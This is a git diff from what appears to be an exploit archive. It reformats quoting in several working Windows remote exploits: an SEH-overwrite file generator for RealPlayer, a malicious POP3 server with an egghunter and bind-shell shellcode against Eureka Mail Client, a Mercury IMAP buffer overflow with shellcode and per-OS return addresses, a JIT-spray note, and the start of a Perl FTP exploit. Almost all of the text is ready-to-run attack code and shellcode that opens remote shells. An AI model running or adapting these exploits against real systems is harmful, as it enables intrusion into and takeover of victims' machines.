-	memcpy(overflow+1072,\"\\x4a\\xe1\\xc9\\x61\",4); // se handler in win xp (pop pop ret)
-	memcpy(overflow+1084,\"\\xeb\\x08\\xeb\\x08\",4); //
-	memcpy(overflow+1088,\"\\xae\\x7f\\xA2\\x60\",4); // se handler in win2k3 (pop pop ret) for small biz or something
-	memcpy(overflow+1100,\"\\xeb\\x08\\xeb\\x08\",4); //
-	memcpy(overflow+1104,\"\\xae\\x7f\\xA2\\x60\",4); // se handler in win2k3 (pop pop ret) enterprise
-	memcpy(overflow+1108,\"\\xeb\\x08\\xeb\\x08\",4); //jump +8 into nops
-	memcpy(overflow+1112,\"\\xbf\\xbb\\xA2\\x60\",4); //overwrite seh (win2k) with call ebx (pncrt.dll - hopefully universal ...^^)
+	memcpy(overflow+1068,"\xeb\x08\xeb\x08",4); //
+	memcpy(overflow+1072,"\x4a\xe1\xc9\x61",4); // se handler in win xp (pop pop ret)
+	memcpy(overflow+1084,"\xeb\x08\xeb\x08",4); //
+	memcpy(overflow+1088,"\xae\x7f\xA2\x60",4); // se handler in win2k3 (pop pop ret) for small biz or something
+	memcpy(overflow+1100,"\xeb\x08\xeb\x08",4); //
+	memcpy(overflow+1104,"\xae\x7f\xA2\x60",4); // se handler in win2k3 (pop pop ret) enterprise
+	memcpy(overflow+1108,"\xeb\x08\xeb\x08",4); //jump +8 into nops
+	memcpy(overflow+1112,"\xbf\xbb\xA2\x60",4); //overwrite seh (win2k) with call ebx (pncrt.dll - hopefully universal ...^^)
     memcpy(overflow+1125,shellcode,sizeof(shellcode)); //our shellcode after some nope to land in 
 
 	if(vuln)
 	{
 		//Write file
-		fprintf(vuln,\"%s%s\\\"/>\\n%s\",pre,overflow,end);
+		fprintf(vuln,"%s%s\"/>\n%s",pre,overflow,end);
 		fclose(vuln);
 	}
-	printf(\"File written.Binds a shell on port 13579.\\nOpen with realplayer to exploit.\\n\");
+	printf("File written.Binds a shell on port 13579.\nOpen with realplayer to exploit.\n");
 	return 0;
 }
 
diff --git a/platforms/windows/remote/10235.py b/platforms/windows/remote/10235.py
index aa0cec77f..11c2de5a9 100755
--- a/platforms/windows/remote/10235.py
+++ b/platforms/windows/remote/10235.py
@@ -8,48 +8,48 @@
 import sys, socket
 
 # egghunter (32 bytes)
-egghunter = (\"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8\"
-\"\\x77\\x30\\x30\\x74\" # this is the egg: w00t
-\"\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7\")
+egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
+"\x77\x30\x30\x74" # this is the egg: w00t
+"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
 
 # windows/shell_bind_tcp - 368 bytes
 # http://www.metasploit.com
 # Encoder: x86/shikata_ga_nai
 # EXITFUNC=thread, LPORT=4444
 
-bindshell = (\"\\xbb\\xd3\\x82\\x28\\x36\\xd9\\xc6\\xd9\\x74\\x24\\xf4\\x5e\\x2b\\xc9\\xb1\"
-\"\\x56\\x83\\xee\\xfc\\x31\\x5e\\x0f\\x03\\x5e\\xdc\\x60\\xdd\\xca\\x0a\\xed\"
-\"\\x1e\\x33\\xca\\x8e\\x97\\xd6\\xfb\\x9c\\xcc\\x93\\xa9\\x10\\x86\\xf6\\x41\"
-\"\\xda\\xca\\xe2\\xd2\\xae\\xc2\\x05\\x53\\x04\\x35\\x2b\\x64\\xa8\\xf9\\xe7\"
-\"\\xa6\\xaa\\x85\\xf5\\xfa\\x0c\\xb7\\x35\\x0f\\x4c\\xf0\\x28\\xff\\x1c\\xa9\"
-\"\\x27\\xad\\xb0\\xde\\x7a\\x6d\\xb0\\x30\\xf1\\xcd\\xca\\x35\\xc6\\xb9\\x60\"
-\"\\x37\\x17\\x11\\xfe\\x7f\\x8f\\x1a\\x58\\xa0\\xae\\xcf\\xba\\x9c\\xf9\\x64\"
-\"\\x08\\x56\\xf8\\xac\\x40\\x97\\xca\\x90\\x0f\\xa6\\xe2\\x1d\\x51\\xee\\xc5\"
-\"\\xfd\\x24\\x04\\x36\\x80\\x3e\\xdf\\x44\\x5e\\xca\\xc2\\xef\\x15\\x6c\\x27\"
-\"\\x11\\xfa\\xeb\\xac\\x1d\\xb7\\x78\\xea\\x01\\x46\\xac\\x80\\x3e\\xc3\\x53\"
-\"\\x47\\xb7\\x97\\x77\\x43\\x93\\x4c\\x19\\xd2\\x79\\x23\\x26\\x04\\x25\\x9c\"
-\"\\x82\\x4e\\xc4\\xc9\\xb5\\x0c\\x81\\x3e\\x88\\xae\\x51\\x28\\x9b\\xdd\\x63\"
-\"\\xf7\\x37\\x4a\\xc8\\x70\\x9e\\x8d\\x2f\\xab\\x66\\x01\\xce\\x53\\x97\\x0b\"
-\"\\x15\\x07\\xc7\\x23\\xbc\\x27\\x8c\\xb3\\x41\\xf2\\x03\\xe4\\xed\\xac\\xe3\"
-\"\\x54\\x4e\\x1c\\x8c\\xbe\\x41\\x43\\xac\\xc0\\x8b\\xf2\\xea\\x0e\\xef\\x57\"
-\"\\x9d\\x72\\x0f\\x46\\x01\\xfa\\xe9\\x02\\xa9\\xaa\\xa2\\xba\\x0b\\x89\\x7a\"
-\"\\x5d\\x73\\xfb\\xd6\\xf6\\xe3\\xb3\\x30\\xc0\\x0c\\x44\\x17\\x63\\xa0\\xec\"
-\"\\xf0\\xf7\\xaa\\x28\\xe0\\x08\\xe7\\x18\\x6b\\x31\\x60\\xd2\\x05\\xf0\\x10\"
-\"\\xe3\\x0f\\x62\\xb0\\x76\\xd4\\x72\\xbf\\x6a\\x43\\x25\\xe8\\x5d\\x9a\\xa3\"
-\"\\x04\\xc7\\x34\\xd1\\xd4\\x91\\x7f\\x51\\x03\\x62\\x81\\x58\\xc6\\xde\\xa5\"
-\"\\x4a\\x1e\\xde\\xe1\\x3e\\xce\\x89\\xbf\\xe8\\xa8\\x63\\x0e\\x42\\x63\\xdf\"
-\"\\xd8\\x02\\xf2\\x13\\xdb\\x54\\xfb\\x79\\xad\\xb8\\x4a\\xd4\\xe8\\xc7\\x63\"
-\"\\xb0\\xfc\\xb0\\x99\\x20\\x02\\x6b\\x1a\\x40\\xe1\\xb9\\x57\\xe9\\xbc\\x28\"
-\"\\xda\\x74\\x3f\\x87\\x19\\x81\\xbc\\x2d\\xe2\\x76\\xdc\\x44\\xe7\\x33\\x5a\"
-\"\\xb5\\x95\\x2c\\x0f\\xb9\\x0a\\x4c\\x1a\")
+bindshell = ("\xbb\xd3\x82\x28\x36\xd9\xc6\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
+"\x56\x83\xee\xfc\x31\x5e\x0f\x03\x5e\xdc\x60\xdd\xca\x0a\xed"
+"\x1e\x33\xca\x8e\x97\xd6\xfb\x9c\xcc\x93\xa9\x10\x86\xf6\x41"
+"\xda\xca\xe2\xd2\xae\xc2\x05\x53\x04\x35\x2b\x64\xa8\xf9\xe7"
+"\xa6\xaa\x85\xf5\xfa\x0c\xb7\x35\x0f\x4c\xf0\x28\xff\x1c\xa9"
+"\x27\xad\xb0\xde\x7a\x6d\xb0\x30\xf1\xcd\xca\x35\xc6\xb9\x60"
+"\x37\x17\x11\xfe\x7f\x8f\x1a\x58\xa0\xae\xcf\xba\x9c\xf9\x64"
+"\x08\x56\xf8\xac\x40\x97\xca\x90\x0f\xa6\xe2\x1d\x51\xee\xc5"
+"\xfd\x24\x04\x36\x80\x3e\xdf\x44\x5e\xca\xc2\xef\x15\x6c\x27"
+"\x11\xfa\xeb\xac\x1d\xb7\x78\xea\x01\x46\xac\x80\x3e\xc3\x53"
+"\x47\xb7\x97\x77\x43\x93\x4c\x19\xd2\x79\x23\x26\x04\x25\x9c"
+"\x82\x4e\xc4\xc9\xb5\x0c\x81\x3e\x88\xae\x51\x28\x9b\xdd\x63"
+"\xf7\x37\x4a\xc8\x70\x9e\x8d\x2f\xab\x66\x01\xce\x53\x97\x0b"
+"\x15\x07\xc7\x23\xbc\x27\x8c\xb3\x41\xf2\x03\xe4\xed\xac\xe3"
+"\x54\x4e\x1c\x8c\xbe\x41\x43\xac\xc0\x8b\xf2\xea\x0e\xef\x57"
+"\x9d\x72\x0f\x46\x01\xfa\xe9\x02\xa9\xaa\xa2\xba\x0b\x89\x7a"
+"\x5d\x73\xfb\xd6\xf6\xe3\xb3\x30\xc0\x0c\x44\x17\x63\xa0\xec"
+"\xf0\xf7\xaa\x28\xe0\x08\xe7\x18\x6b\x31\x60\xd2\x05\xf0\x10"
+"\xe3\x0f\x62\xb0\x76\xd4\x72\xbf\x6a\x43\x25\xe8\x5d\x9a\xa3"
+"\x04\xc7\x34\xd1\xd4\x91\x7f\x51\x03\x62\x81\x58\xc6\xde\xa5"
+"\x4a\x1e\xde\xe1\x3e\xce\x89\xbf\xe8\xa8\x63\x0e\x42\x63\xdf"
+"\xd8\x02\xf2\x13\xdb\x54\xfb\x79\xad\xb8\x4a\xd4\xe8\xc7\x63"
+"\xb0\xfc\xb0\x99\x20\x02\x6b\x1a\x40\xe1\xb9\x57\xe9\xbc\x28"
+"\xda\x74\x3f\x87\x19\x81\xbc\x2d\xe2\x76\xdc\x44\xe7\x33\x5a"
+"\xb5\x95\x2c\x0f\xb9\x0a\x4c\x1a")
 
-buff = (\"\\x41\" * 710);
-retn = (\"\\x53\\x93\\x42\\x7e\"); #JMP ESP USER32.DLL XPSP3
-nops = (\"\\x90\" * 218);
-junk = (\"\\xcc\" * 2000);
-sploit = (\"-ERR \" + buff + retn + egghunter + nops + junk + \"w00tw00t\" + bindshell);
+buff = ("\x41" * 710);
+retn = ("\x53\x93\x42\x7e"); #JMP ESP USER32.DLL XPSP3
+nops = ("\x90" * 218);
+junk = ("\xcc" * 2000);
+sploit = ("-ERR " + buff + retn + egghunter + nops + junk + "w00tw00t" + bindshell);
 
-print (\"\"\"
+print ("""
 ##########################################################
 #
 # Eureka Mail Client Remote Buffer Overflow Exploit (XPSP3)
@@ -60,20 +60,20 @@ print (\"\"\"
 # Note: Point the client to this address and check your mail
 #
 ##########################################################
-\"\"\")
+""")
 
 try:
 	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-	s.bind((\'\', 110))
+	s.bind(('', 110))
 	s.listen(1)
-	print (\"[*] Listening on port 110.\")
-	print (\"[*] Have someone connect to you.\")
-	print (\"[*] Type -c to exit.\")
+	print ("[*] Listening on port 110.")
+	print ("[*] Have someone connect to you.")
+	print ("[*] Type -c to exit.")
 	conn, addr = s.accept()
-	print \'[*] Received connection from: \', addr
+	print '[*] Received connection from: ', addr
 
 	while 1:
 		conn.send(sploit)
 	conn.close()
 except:
-	print (\"[*] Done. Wait a bit for the egghunter then connect to the victim on port 4444\")
+	print ("[*] Done. Wait a bit for the egghunter then connect to the victim on port 4444")
diff --git a/platforms/windows/remote/1223.c b/platforms/windows/remote/1223.c
index 708b8fb88..2c0b484e3 100755
--- a/platforms/windows/remote/1223.c
+++ b/platforms/windows/remote/1223.c
@@ -1,6 +1,6 @@
 /*   
      Mercury imap4 server remote buffer overflow exploit
-     author : c0d3r \"kaveh razavi\" c0d3r@ihsteam.com c0d3r@c0d3r.org
+     author : c0d3r "kaveh razavi" c0d3r@ihsteam.com c0d3r@c0d3r.org
      package : Mercury mail transport system 4.01a and prolly prior
      workaround : upgrade to 4.01b version
      advisory : not available right now 
@@ -29,7 +29,7 @@
 /*
 /*
 
-D:\\projects>mercury_imap.exe ihs 143 4 c0d3r abc
+D:\projects>mercury_imap.exe ihs 143 4 c0d3r abc
 
 -------- mercury imap remote BOF exploit by c0d3r
 
@@ -50,7 +50,7 @@ D:\\projects>mercury_imap.exe ihs 143 4 c0d3r abc
 Microsoft Windows [Version 5.2.3790]
 (C) Copyright 1985-2003 Microsoft Corp.
 
-H:\\MERCURY>
+H:\MERCURY>
 
 */
 
@@ -58,7 +58,7 @@ H:\\MERCURY>
 #include 
 #include 
 #include 
-#pragma comment(lib, \"ws2_32.lib\")
+#pragma comment(lib, "ws2_32.lib")
 #define NOP 0x90
 #define size 625
 // nops + return address + 16 nops + shellcode 260 + 4 + 16 + 344 + 1   
@@ -68,28 +68,28 @@ H:\\MERCURY>
 // bad chars : 0x00 0x0a 0x20 0x0d
 
 char shellcode[]=
-\"\\x33\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x92\"
-\"\\xc9\\xd2\\x3b\\x83\\xeb\\xfc\\xe2\\xf4\\x6e\\xa3\\x39\\x76\\x7a\\x30\\x2d\\xc4\"
-\"\\x6d\\xa9\\x59\\x57\\xb6\\xed\\x59\\x7e\\xae\\x42\\xae\\x3e\\xea\\xc8\\x3d\\xb0\"
-\"\\xdd\\xd1\\x59\\x64\\xb2\\xc8\\x39\\x72\\x19\\xfd\\x59\\x3a\\x7c\\xf8\\x12\\xa2\"
-\"\\x3e\\x4d\\x12\\x4f\\x95\\x08\\x18\\x36\\x93\\x0b\\x39\\xcf\\xa9\\x9d\\xf6\\x13\"
-\"\\xe7\\x2c\\x59\\x64\\xb6\\xc8\\x39\\x5d\\x19\\xc5\\x99\\xb0\\xcd\\xd5\\xd3\\xd0\"
-\"\\x91\\xe5\\x59\\xb2\\xfe\\xed\\xce\\x5a\\x51\\xf8\\x09\\x5f\\x19\\x8a\\xe2\\xb0\"
-\"\\xd2\\xc5\\x59\\x4b\\x8e\\x64\\x59\\x7b\\x9a\\x97\\xba\\xb5\\xdc\\xc7\\x3e\\x6b\"
-\"\\x6d\\x1f\\xb4\\x68\\xf4\\xa1\\xe1\\x09\\xfa\\xbe\\xa1\\x09\\xcd\\x9d\\x2d\\xeb\"
-\"\\xfa\\x02\\x3f\\xc7\\xa9\\x99\\x2d\\xed\\xcd\\x40\\x37\\x5d\\x13\\x24\\xda\\x39\"
-\"\\xc7\\xa3\\xd0\\xc4\\x42\\xa1\\x0b\\x32\\x67\\x64\\x85\\xc4\\x44\\x9a\\x81\\x68\"
-\"\\xc1\\x9a\\x91\\x68\\xd1\\x9a\\x2d\\xeb\\xf4\\xa1\\xc3\\x67\\xf4\\x9a\\x5b\\xda\"
-\"\\x07\\xa1\\x76\\x21\\xe2\\x0e\\x85\\xc4\\x44\\xa3\\xc2\\x6a\\xc7\\x36\\x02\\x53\"
-\"\\x36\\x64\\xfc\\xd2\\xc5\\x36\\x04\\x68\\xc7\\x36\\x02\\x53\\x77\\x80\\x54\\x72\"
-\"\\xc5\\x36\\x04\\x6b\\xc6\\x9d\\x87\\xc4\\x42\\x5a\\xba\\xdc\\xeb\\x0f\\xab\\x6c\"
-\"\\x6d\\x1f\\x87\\xc4\\x42\\xaf\\xb8\\x5f\\xf4\\xa1\\xb1\\x56\\x1b\\x2c\\xb8\\x6b\"
-\"\\xcb\\xe0\\x1e\\xb2\\x75\\xa3\\x96\\xb2\\x70\\xf8\\x12\\xc8\\x38\\x37\\x90\\x16\"
-\"\\x6c\\x8b\\xfe\\xa8\\x1f\\xb3\\xea\\x90\\x39\\x62\\xba\\x49\\x6c\\x7a\\xc4\\xc4\"
-\"\\xe7\\x8d\\x2d\\xed\\xc9\\x9e\\x80\\x6a\\xc3\\x98\\xb8\\x3a\\xc3\\x98\\x87\\x6a\"
-\"\\x6d\\x19\\xba\\x96\\x4b\\xcc\\x1c\\x68\\x6d\\x1f\\xb8\\xc4\\x6d\\xfe\\x2d\\xeb\"
-\"\\x19\\x9e\\x2e\\xb8\\x56\\xad\\x2d\\xed\\xc0\\x36\\x02\\x53\\x62\\x43\\xd6\\x64\"
-\"\\xc1\\x36\\x04\\xc4\\x42\\xc9\\xd2\\x3b\";
+"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92"
+"\xc9\xd2\x3b\x83\xeb\xfc\xe2\xf4\x6e\xa3\x39\x76\x7a\x30\x2d\xc4"
+"\x6d\xa9\x59\x57\xb6\xed\x59\x7e\xae\x42\xae\x3e\xea\xc8\x3d\xb0"
+"\xdd\xd1\x59\x64\xb2\xc8\x39\x72\x19\xfd\x59\x3a\x7c\xf8\x12\xa2"
+"\x3e\x4d\x12\x4f\x95\x08\x18\x36\x93\x0b\x39\xcf\xa9\x9d\xf6\x13"
+"\xe7\x2c\x59\x64\xb6\xc8\x39\x5d\x19\xc5\x99\xb0\xcd\xd5\xd3\xd0"
+"\x91\xe5\x59\xb2\xfe\xed\xce\x5a\x51\xf8\x09\x5f\x19\x8a\xe2\xb0"
+"\xd2\xc5\x59\x4b\x8e\x64\x59\x7b\x9a\x97\xba\xb5\xdc\xc7\x3e\x6b"
+"\x6d\x1f\xb4\x68\xf4\xa1\xe1\x09\xfa\xbe\xa1\x09\xcd\x9d\x2d\xeb"
+"\xfa\x02\x3f\xc7\xa9\x99\x2d\xed\xcd\x40\x37\x5d\x13\x24\xda\x39"
+"\xc7\xa3\xd0\xc4\x42\xa1\x0b\x32\x67\x64\x85\xc4\x44\x9a\x81\x68"
+"\xc1\x9a\x91\x68\xd1\x9a\x2d\xeb\xf4\xa1\xc3\x67\xf4\x9a\x5b\xda"
+"\x07\xa1\x76\x21\xe2\x0e\x85\xc4\x44\xa3\xc2\x6a\xc7\x36\x02\x53"
+"\x36\x64\xfc\xd2\xc5\x36\x04\x68\xc7\x36\x02\x53\x77\x80\x54\x72"
+"\xc5\x36\x04\x6b\xc6\x9d\x87\xc4\x42\x5a\xba\xdc\xeb\x0f\xab\x6c"
+"\x6d\x1f\x87\xc4\x42\xaf\xb8\x5f\xf4\xa1\xb1\x56\x1b\x2c\xb8\x6b"
+"\xcb\xe0\x1e\xb2\x75\xa3\x96\xb2\x70\xf8\x12\xc8\x38\x37\x90\x16"
+"\x6c\x8b\xfe\xa8\x1f\xb3\xea\x90\x39\x62\xba\x49\x6c\x7a\xc4\xc4"
+"\xe7\x8d\x2d\xed\xc9\x9e\x80\x6a\xc3\x98\xb8\x3a\xc3\x98\x87\x6a"
+"\x6d\x19\xba\x96\x4b\xcc\x1c\x68\x6d\x1f\xb8\xc4\x6d\xfe\x2d\xeb"
+"\x19\x9e\x2e\xb8\x56\xad\x2d\xed\xc0\x36\x02\x53\x62\x43\xd6\x64"
+"\xc1\x36\x04\xc4\x42\xc9\xd2\x3b";
 
 
   void gotshell (int newsock);
@@ -100,68 +100,68 @@ char shellcode[]=
   char buffer[size];
   char point_esp[5];
   unsigned short port;
-  char req1[] =  \"\\x30\\x30\\x30\\x30\\x20\\x4C\\x4F\\x47\\x49\\x4E\";
-  char req2[] =  \"\\x30\\x30\\x30\\x31\";
+  char req1[] =  "\x30\x30\x30\x30\x20\x4C\x4F\x47\x49\x4E";
+  char req2[] =  "\x30\x30\x30\x31";
   unsigned char *login,*exploit;
-  char vuln_command[] = \"\\x4C\\x49\\x53\\x54\";
-  char winxpsp1[]   = \"\\xCC\\x59\\xFB\\x77\"; // jmp esp in ntdll
-  char winxpsp2[]   = \"\\xED\\x1E\\x94\\x7C\"; // jmp esp (not tested)
-  char win2ksp4[]   = \"\\x23\\xde\\xaf\\x01\"; // call esp in kernel32.dll
-  char win2k3_sp0[] = \"\\xAB\\x8B\\xFB\\x77\"; // jmp esp in ntdll
-  char win2k3_sp1[] = \"\\x6A\\xFA\\xE8\\x77\"; // push esp - ret in kernel32
+  char vuln_command[] = "\x4C\x49\x53\x54";
+  char winxpsp1[]   = "\xCC\x59\xFB\x77"; // jmp esp in ntdll
+  char winxpsp2[]   = "\xED\x1E\x94\x7C"; // jmp esp (not tested)
+  char win2ksp4[]   = "\x23\xde\xaf\x01"; // call esp in kernel32.dll
+  char win2k3_sp0[] = "\xAB\x8B\xFB\x77"; // jmp esp in ntdll
+  char win2k3_sp1[] = "\x6A\xFA\xE8\x77"; // push esp - ret in kernel32
                     
  int main (int argc, char *argv[]){
   
 	
  if(argc < 6) {
- printf(\"\\n-------- mercury imap remote BOF exploit by c0d3r\\n\");
- printf(\"-------- usage : imap.exe host port target username password\\n\");
- printf(\"-------- target 1 : windows xp service pack 1         : 0\\n\");
- printf(\"-------- target 2 : windows xp service pack 2         : 1\\n\");
- printf(\"-------- target 3 : windoes 2k advanced server sp 4   : 2\\n\");
- printf(\"-------- target 4 : windoes 2k3 server enterprise sp0 : 3\\n\");
- printf(\"-------- target 5 : windoes 2k3 server enterprise sp1 : 4\\n\");
- printf(\"-------- eg : imap.exe 127.0.0.1 143 0 c0d3r abc\\n\\n\");	
+ printf("\n-------- mercury imap remote BOF exploit by c0d3r\n");
+ printf("-------- usage : imap.exe host port target username password\n");
+ printf("-------- target 1 : windows xp service pack 1         : 0\n");
+ printf("-------- target 2 : windows xp service pack 2         : 1\n");
+ printf("-------- target 3 : windoes 2k advanced server sp 4   : 2\n");
+ printf("-------- target 4 : windoes 2k3 server enterprise sp0 : 3\n");
+ printf("-------- target 5 : windoes 2k3 server enterprise sp1 : 4\n");
+ printf("-------- eg : imap.exe 127.0.0.1 143 0 c0d3r abc\n\n");	
  exit(-1) ;
   } 
-  printf(\"\\n-------- mercury imap remote BOF exploit by c0d3r\\n\\n\");
+  printf("\n-------- mercury imap remote BOF exploit by c0d3r\n\n");
  os = (unsigned short)atoi(argv[3]); 	 
   switch(os)
   {
    case 0:
     strcat(point_esp,winxpsp1);
-    printf(\"[+] target : windows xp service pack 1\\n\");
+    printf("[+] target : windows xp service pack 1\n");
 	break;
    case 1:
     strcat(point_esp,winxpsp2); 
-    printf(\"[+] target : windows xp service pack 2\\n\");
+    printf("[+] target : windows xp service pack 2\n");
 	break;
    case 2:
     strcat(point_esp,win2ksp4); 
-    printf(\"[+] target : windows 2000 advanced server service pack 4\\n\");
+    printf("[+] target : windows 2000 advanced server service pack 4\n");
 	break;
    case 3:
 	strcat(point_esp,win2k3_sp0);
-	printf(\"[+] target : windows 2003 server enterprise service pack 0\\n\");
+	printf("[+] target : windows 2003 server enterprise service pack 0\n");
 	break;
    case 4:
 	strcat(point_esp,win2k3_sp1);
-	printf(\"[+] target : windows 2003 server enterprise service pack 1\\n\");
+	printf("[+] target : windows 2003 server enterprise service pack 1\n");
 	break;
    default:
-    printf(\"\\n[-] this target doesnt exist in the list\\n\\n\");
+    printf("\n[-] this target doesnt exist in the list\n\n");
    
     exit(-1);
   }  
 	
-  printf(\"[+] building login data\\n\");
+  printf("[+] building login data\n");
   login = malloc(256);
   memset(login,0,256);
-  sprintf(login,\"%s %s %s\\r\\n\",req1,argv[4],argv[5]);
+  sprintf(login,"%s %s %s\r\n",req1,argv[4],argv[5]);
 
     // Creating heart of exploit code 4 5
   
-    printf(\"[+] building overflow string\");
+    printf("[+] building overflow string");
   
     memset(buffer,NOP,size);
     memcpy(buffer+260,point_esp,sizeof(point_esp)-1);
@@ -169,13 +169,13 @@ char shellcode[]=
     buffer[size] = 0;
     exploit = malloc(1000);
     memset(exploit,0,1000);
-    sprintf(exploit,\"%s %s %s\\r\\n\",req2,vuln_command,buffer);
+    sprintf(exploit,"%s %s %s\r\n",req2,vuln_command,buffer);
 	
    // EO heart of exploit code 
 
   
 			if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
-   printf(\"[-] WSAStartup failed !\\n\");
+   printf("[-] WSAStartup failed !\n");
    exit(-1);
   }
 	hp = gethostbyname(argv[1]);
@@ -184,12 +184,12 @@ char shellcode[]=
    addr = inet_addr(argv[1]);
   }
   if ((!hp)  && (addr == INADDR_NONE) ){
-   printf(\"[-] unable to resolve %s\\n\",argv[1]);
+   printf("[-] unable to resolve %s\n",argv[1]);
    exit(-1);
   }
   sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
   if (!sock){ 
-   printf(\"[-] socket() error...\\n\");
+   printf("[-] socket() error...\n");
    exit(-1);
   }
 	  if (hp != NULL)
@@ -205,50 +205,50 @@ char shellcode[]=
   tcp.sin_port=htons(port);
    
   
-  printf(\"\\n[+] attacking host %s\\n\" , argv[1]) ;
+  printf("\n[+] attacking host %s\n" , argv[1]) ;
   
   Sleep(1000);
   
-  printf(\"[+] packet size = %d byte\\n\" , sizeof(buffer));
+  printf("[+] packet size = %d byte\n" , sizeof(buffer));
   
   rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
   if(rc==0)
   {
     
      Sleep(1500) ;
-     printf(\"[+] connected\\n\") ;
-     printf(\"[+] sending login info\\n\") ;
+     printf("[+] connected\n") ;
+     printf("[+] sending login info\n") ;
      send(sock,login,strlen(login),0);
      Sleep(1500);
-     printf(\"[+] sending exploit string\\n\") ;
+     printf("[+] sending exploit string\n") ;
      send(sock,exploit,strlen(exploit),0);
      Sleep(1500);
-     printf(\"[+] exploit sent successfully to %s \\n\" , argv[1]);
-     printf(\"[+] trying to get shell\\n\");
-     printf(\"[+] connecting to %s on port 4444\\n\",argv[1]);
+     printf("[+] exploit sent successfully to %s \n" , argv[1]);
+     printf("[+] trying to get shell\n");
+     printf("[+] connecting to %s on port 4444\n",argv[1]);
      sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
      Sleep(1500);
      if (!sock){ 
-     printf(\"[-] socket() error...\\n\");
+     printf("[-] socket() error...\n");
      exit(-1);
 	 }
 	 tcp.sin_family = AF_INET;
 	 tcp.sin_port=htons(4444);
 	 rc2=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
      if(rc2 != 0) {
-	 printf(\"[-] exploit probably failed\\n\");
+	 printf("[-] exploit probably failed\n");
 	 exit(-1);
 	 }
      if(rc2==0)
 	 {
-	  printf(\"[+] target exploited successfully\\n\");
-      printf(\"[+] Dropping into shell\\n\\n\");
+	  printf("[+] target exploited successfully\n");
+      printf("[+] Dropping into shell\n\n");
 	 gotshell(sock);
 	 }
   } 
   
   else {
-      printf(\"[-] ouch! Server is not listening .... \\n\");
+      printf("[-] ouch! Server is not listening .... \n");
  }
   shutdown(sock,1);
   closesocket(sock);
@@ -274,14 +274,14 @@ char shellcode[]=
 	length = recv (new_sock, bufferx, sizeof (bufferx), 0);
 	if (length <= 0) 
 		{
-	printf (\"[-] Connection closed.\\n\");
+	printf ("[-] Connection closed.\n");
 	WSACleanup();
 	return;
 		}
 	length = write (1, bufferx, length);
 	if (length <= 0) 
 		{
-	printf(\"[-] Connection closed.\\n\");
+	printf("[-] Connection closed.\n");
 	WSACleanup();
 	return;
 		}
@@ -291,14 +291,14 @@ char shellcode[]=
 	length = read (0, bufferx, sizeof (bufferx));
 	if (length <= 0) 
 		{
-	printf(\"[-] Connection closed.\\n\");
+	printf("[-] Connection closed.\n");
 	WSACleanup();
 	return;
 		}
 	length = send(new_sock, bufferx, length, 0);
 	if (length <= 0) 
 	{
-	printf(\"[-] Connection closed.\\n\");
+	printf("[-] Connection closed.\n");
 	WSACleanup();
 	return;
 				}
diff --git a/platforms/windows/remote/12614.txt b/platforms/windows/remote/12614.txt
index 4b287929e..aeda58600 100755
--- a/platforms/windows/remote/12614.txt
+++ b/platforms/windows/remote/12614.txt
@@ -4,7 +4,7 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp
 Unzip and run START.htm
 
 This exploit use JIT-SPRAY for DEP and ASLR bypass.
-jit-shellcode: system(\"notepad\")
+jit-shellcode: system("notepad")
 
 0day.html - use 0x09090101 address for CALL JITed shellcode.
 
diff --git a/platforms/windows/remote/1448.pl b/platforms/windows/remote/1448.pl
index 94dfad554..047425cb3 100755
--- a/platforms/windows/remote/1448.pl
+++ b/platforms/windows/remote/1448.pl
@@ -6,56 +6,56 @@ use Net::FTP;                 # <- jo, að tinginys :)
 use Switch;
 
 if (@ARGV < 3) {
-print \"--------------------------------------------------------------------\\n\";
-print \"Usage : exploit.pl -hVictimsIPAddress -yYourIPAddress -oOffsetNumber\\n\";
-print \" Offsets: \\n\";
-print \" 1 - 0x76B43AE0 Windows XP SP2 winmm.dll call esp\\n\";
-print \" 2 - 0x76B5D17B Windows XP SP1 winmm.dll call esp\\n\";
-print \" 3 - 0x71AB7BFB Windows XP SP0 ws2_32.dll jmp esp\\n\";
-print \" 4 - 0x9C2295DF FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp\\n\";
-print \" If values not specified, default values will be used.\\n\";
-print \" Example : ./eploit.pl -h127.0.0.1 -y127.0.0.1 -o1\\n\";
-print \"--------------------------------------------------------------------\\n\";
+print "--------------------------------------------------------------------\n";
+print "Usage : exploit.pl -hVictimsIPAddress -yYourIPAddress -oOffsetNumber\n";
+print " Offsets: \n";
+print " 1 - 0x76B43AE0 Windows XP SP2 winmm.dll call esp\n";
+print " 2 - 0x76B5D17B Windows XP SP1 winmm.dll call esp\n";
+print " 3 - 0x71AB7BFB Windows XP SP0 ws2_32.dll jmp esp\n";
+print " 4 - 0x9C2295DF FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp\n";
+print " If values not specified, default values will be used.\n";
+print " Example : ./eploit.pl -h127.0.0.1 -y127.0.0.1 -o1\n";
+print "--------------------------------------------------------------------\n";
 }
-$host =   \"127.0.0.1\";        # aukos ip
-$yourip = \"127.0.0.1\" ;       # Reikalingas tam, kad bûtø galima sulyginti ðelkodà, nes i steka ásiraðo ir jusu ip adresas, todel áraðykit savo iðorini (jei neturit tokio - gateway ip)
-$offset = \"\\xE0\\x3A\\xB4\\x76\"; # defaultinis offsetas á winmm.dll esantá call esp   (WinXP SP 2)
+$host =   "127.0.0.1";        # aukos ip
